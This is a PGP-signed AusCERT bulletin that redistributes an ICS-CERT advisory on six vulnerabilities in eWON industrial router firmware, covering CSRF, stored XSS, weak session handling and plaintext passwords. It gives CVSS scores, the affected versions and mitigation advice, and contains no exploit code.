-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2015.3211
                           eWON Vulnerabilities
                             23 December 2015

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           eWON routers
Publisher:         ICS-CERT
Operating System:  Network Appliance
Impact/Access:     Cross-site Request Forgery -- Remote with User Interaction
                   Cross-site Scripting       -- Remote with User Interaction
                   Access Confidential Data   -- Remote/Unauthenticated      
                   Unauthorised Access        -- Remote/Unauthenticated      
Resolution:        Patch/Upgrade
CVE Names:         CVE-2015-7929 CVE-2015-7928 CVE-2015-7927
                   CVE-2015-7926 CVE-2015-7925 CVE-2015-7924

Original Bulletin: 
   https://ics-cert.us-cert.gov/advisories/ICSA-15-351-03

- --------------------------BEGIN INCLUDED TEXT--------------------

Advisory (ICSA-15-351-03)

eWON Vulnerabilities

Original release date: December 17, 2015

Legal Notice

All information products included in http://ics-cert.us-cert.gov are provided
"as is" for informational purposes only. The Department of Homeland Security
(DHS) does not provide any warranties of any kind regarding any information
contained within. DHS does not endorse any commercial product or service,
referenced in this product or otherwise. Further dissemination of this
product is governed by the Traffic Light Protocol (TLP) marking in the
header. For more information about TLP, see http://www.us-cert.gov/tlp/.

OVERVIEW

Independent researcher Karn Ganeshen has identified several vulnerabilities
in the eWON sa industrial router. eWON sa has produced an updated firmware
to mitigate these vulnerabilities.

These vulnerabilities could be exploited remotely.

AFFECTED PRODUCTS

The following eWON router firmware versions are affected:

    eWON firmware versions prior to 10.1s0

IMPACT

Vulnerabilities between the application server and client browsers
can impact the integrity of what the server is presenting, allow for
information leakage, and allow for unauthorized and unauthenticated use
of the application server.

Sessions are an established communication between a web server or application
and a user's browser. Sessions can carry benefits like retaining information
such as browsing history. They can also use keys to establish encryption of
communications between the server and the browser. One of the vulnerabilities
is in the eWON software function to log off. Despite pressing this button,
the client browser keeps the session alive allowing a malicious party to
use the same browser session to continue interacting with the device.

Cross-site scripting takes advantage of web servers that return dynamically
generated web pages. Cross-site scripting also allows users to post
viewable content in order to execute arbitrary HTML and active content,
such as JavaScript, ActiveX, and VBScript, on a remote machine browsing
the site within the context of a client-server session. This potentially
allows the attacker to redirect the web page to a malicious location,
hijack the client-server session, engage in network reconnaissance,
and plant backdoor programs. Please refer to the ICS-CERT Abstract on
Cross-Site Scripting for more information and additional mitigations.

A cross-site request forgery (CSRF) attack may allow the web browser to
perform an unwanted action on a trusted site for which the user is currently
authenticated. eWON web server application does not use CSRF Tokens anywhere
and, therefore, allows any application function to be silently executed.

The server allows direct entry and manipulation of the URL allowing an
unauthenticated user to gather information and status of I/O servers
through the use of a forged URL.

The server does not encrypt sensitive data like passwords. These are passed
in unencrypted (in plain) text allowing a malicious party to retrieve
them from network traffic. The autocomplete setting of some eWON forms
also allows these passwords to be retrieved from the browser. Compromise
of the credentials would allow unauthenticated access.

eWON firmware web server allows the use of the HTML command GET in place
of POST. GET is less secure because data that are sent are part of the URL.

Impact to individual organizations depends on many factors that are unique
to each organization. NCCIC/ICS-CERT recommends that organizations evaluate
the impact of these vulnerabilities based on their operational environment,
architecture, and product implementation.
BACKGROUND

eWON sa is a Belguim-based company that maintains offices in several
countries around the world, including the United States and Japan.

The affected products, eWON, is an industrial router. According to eWON
sa, eWON routers are deployed across several sectors including Commercial
Facilities, Critical Manufacturing, Energy, Water and Wastewater Systems,
and others.

VULNERABILITY CHARACTERIZATION

VULNERABILITY OVERVIEW

WEAK SESSION MANAGEMENT[a]

The software function to log off retains the session within the browser
allowing a malicious party to use the same browser session to continue
interacting with the device.

CVE-2015-7924[b] has been assigned to this vulnerability. A CVSS v3 base
score of 8.8 and a temporal score of 7.9 have been assigned; the CVSS
vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C).[c]

CROSS-SITE REQUEST FORGERY ATTACKS[d]

Cross-site request forgery is an exploit that allows for potential malicious
commands to be passed from a user to the application server. eWON web
application contains a global CSRF vulnerability. There is no anti-CSRF token
in use, either per page or per (configuration) functions. An attacker can
perform actions with the same permissions as the victim user, provided the
victim has an active session and is induced to trigger the malicious request.

Successful exploitation may allow the execution of firmware upload, device
reboot, or deletion of device configuration.

CVE-2015-7925[e] has been assigned to this vulnerability. A CVSS v3 base
score of 8.0 and a temporal score of 7.6 have been assigned; the CVSS
vector string is (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C).[f]

WEAK RBAC CONTROLS[g]

The software allows an unauthenticated user to gather information and
status of I/O servers through the use of a forged URL.

CVE-2015-7926[h] has been assigned to this vulnerability. A CVSS v3 base
score of 9.9 and a temporal score of 8.9 have been assigned; the CVSS
vector string is (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C).[i]

STORED CROSS-SITE SCRIPTING[j]

Stored cross-site scripting refers to client-side code injection where an
attacker can execute malicious script on a web server or application. This
malicious script is then served to other users of the web server or
application who become victims.

CVE-2015-7927[k] has been assigned to this vulnerability. A CVSS v3 base
score of 6.1 and a temporal score of 5.8 have been assigned; the CVSS
vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RL:U/RC:C).[l]

PASSWORDS NOT SECURED[m]

Passwords are passed in plain text allowing a malicious party to retrieve
them from network traffic. The autocomplete setting of some eWON forms
also allows these passwords to be retrieved from the browser. Compromise
of the credentials would allow unauthenticated access.

CVE-2015-7928[n] has been assigned to this vulnerability. A CVSS v3 base
score of 9.3 and a temporal score of 8.8 have been assigned; the CVSS
vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N/E:P/RL:U/RC:C).[o]

POST/GET ISSUES[p]

eWON firmware web server allows the use of the HTML command GET in place
of POST. GET is less secure because data that are sent are part of the URL.

CVE-2015-7929[q] has been assigned to this vulnerability. A CVSS v3 base
score of 4.3 and a temporal score of 4.1 have been assigned; the CVSS
vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:U/RC:C).[r]

VULNERABILITY DETAILS

EXPLOITABILITY

These vulnerabilities could be exploited remotely.

EXISTENCE OF EXPLOIT

No known public exploits specifically target these vulnerabilities.

DIFFICULTY

An attacker with a low skill would be able to exploit these vulnerabilities.

MITIGATION

eWON sa has mitigated some (Weak Session Management, Weak RBAC Controls,
and partially Passwords not secured) of the aforementioned vulnerabilities
with its new updated firmware. In the case of vulnerabilities not
mitigated by firmware updates, eWON sa recommends using the router in a
secure environment. More information on the eWON's mitigation of these
vulnerabilities can be found on their web site at:

http://ewon.biz/support/news/support/ewon-security-enhancement-7529-01

The newest version of their firmware may be found at:

http://ewon.biz/support/product/download-firmware/firmware-2

ICS-CERT recommends that users take defensive measures to minimize the
risk of exploitation of these vulnerabilities. Specifically, users should:

    Minimize network exposure for all control system devices and/or systems,
    and ensure that they are not accessible from the Internet.
    Locate control system networks and remote devices behind firewalls,
    and isolate them from the business network.
    When remote access is required, use secure methods, such as Virtual
    Private Networks (VPNs), recognizing that VPNs may have vulnerabilities
    and should be updated to the most current version available. Also
    recognize that VPN is only as secure as the connected devices.

ICS-CERT reminds organizations to perform proper impact analysis and risk
assessment prior to deploying defensive measures.

ICS-CERT also provides a section for control systems
security recommended practices on the ICS-CERT web page at:
http://ics-cert.us-cert.gov/content/recommended-practices. Several
recommended practices are available for reading and download, including
Improving Industrial Control Systems Cybersecurity with Defense-in-Depth
Strategies.

Additional mitigation guidance and recommended practices are
publicly available in the ICS-CERT Technical Information Paper,
ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation
Strategies, that is available for download from the ICS-CERT web site
(http://ics-cert.us-cert.gov/).

Organizations observing any suspected malicious activity should follow their
established internal procedures and report their findings to ICS-CERT for
tracking and correlation against other incidents.

    a.
    CWE-613: Insufficient Session Expiration,
    http://cwe.mitre.org/data/definitions/613.html, web site last accessed
    December 17, 2015.
    b.
    NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7924,
    NIST uses this advisory to create the CVE web site report. This web
    site will be active sometime after publication of this advisory.
    c.
    CVSS Calculator,
    https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S...
    , web site last accessed December 15, 2015.
    d.
    CWE-352: Cross-Site Request Forgery (CSRF),
    http://cwe.mitre.org/data/definitions/352.html, web site last accessed
    December 17, 2015.
    e.
    NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7925,
    NIST uses this advisory to create the CVE web site report. This web
    site will be active sometime after publication of this advisory.
    f.
    CVSS Calculator,
    https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S...
    , web site last accessed December 17, 2015.
    g.
    CWE-274: Improper Handling of Insufficient Privileges,
    http://cwe.mitre.org/data/definitions/274.html, web site last accessed
    December 17, 2015.
    h.
    NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7926,
    NIST uses this advisory to create the CVE web site report. This web
    site will be active sometime after publication of this advisory.
    i.
    CVSS Calculator,
    https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S...
    , web site last accessed December 17, 2015.
    j.
    CWE-79: Improper Neutralization of Input During Web Page Generation
    (Cross-site Scripting), http://cwe.mitre.org/data/definitions/79.html,
    web site last accessed December 17, 2015.
    k.
    NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7927,
    NIST uses this advisory to create the CVE web site report. This web
    site will be active sometime after publication of this advisory.
    l.
    CVSS Calculator,
    https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S...
    , web site last accessed December 17, 2015.
    m.
    CWE-255: Credentials Management,
    http://cwe.mitre.org/data/definitions/255.html, web site last accessed
    December 17, 2015.
    n.
    NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7928,
    NIST uses this advisory to create the CVE web site report. This web
    site will be active sometime after publication of this advisory.
    o.
    CVSS Calculator,
    https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S...
    , web site last accessed December 17, 2015.
    p.
    CWE-598: Information Exposure Through Query Strings in GET Request,
    http://cwe.mitre.org/data/definitions/598.html, web site last accessed
    December 17, 2015.
    q.
    NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7929,
    NIST uses this advisory to create the CVE web site report. This web
    site will be active sometime after publication of this advisory.
    r.
    CVSS Calculator,
    https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S...
    , web site last accessed December 17, 2015.

Contact Information

For any questions related to this report, please contact ICS-CERT at:

Email: ics-cert@hq.dhs.gov
Toll Free: 1-877-776-7585
International Callers: (208) 526-0900

For industrial control systems security information and incident reporting:
http://ics-cert.us-cert.gov

ICS-CERT continuously strives to improve its products and services. You
can help by choosing one of the links below to provide feedback about
this product.

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBVnnkV36ZAP0PgtI9AQIoYg//Zsz2XCmqTA/PN1HIyDA1CGDd5M8S6ROU
ruxYzlzgwXsq5qD4PdqOfcpHWWYbTR5l9aLrcihJwHz2mHLNOjN3X+wGavpbMLzo
F+RdCVxeDNYnrdMW4hLijCjVPSJLa/qt1jod/8nEGvrw1QBH5y9h9TJH2YOJY4Ud
Tm3/qTTa+pDFDCT3yAvDkWOe5HsmsMBbLGDfwrh04b4j0wvCl1p2d7ilg+pEBeYN
SuJVFaNe1cuaVYOWyEM2SCtPU1SOozSnaazuSjVaiLr+ixah6Wfh5KvdqESKasfs
mM8jupg1RUfiGRRUnp2QxV786DSmkYpCYGjmUJZbTI0acGB+4DM98ESmAGQCY5Oi
2SutgJ88VREMwcLnZPw6cOdzufGYScuAZbhavNUhWWqv3GZGOcP/Ui48J8s7Qle4
CfyXMSXQDjAyRSscl1HBf3QA8d/5KYbqovv+WcTRxaiZGgc7AIG4Ifr77XLfVtmR
G9DWUbWVOdHcitnELDCWSXXXFcb2ImWn6TIj15jMdNFG2MJ06fD/WNaP7R8cVvsI
aZxngYpfyo1xgIMg9t4BMf9bsB2osTlKcYVLM57sTPmGpexWjkhQYLNO978m4Fho
BRpt+JvXNstxV8CUenEriauKHwGORG75hB28XaiW0pdPtpvBirptcqx9bcK+vDsI
v90zqefqz64=
=1rqu
-----END PGP SIGNATURE-----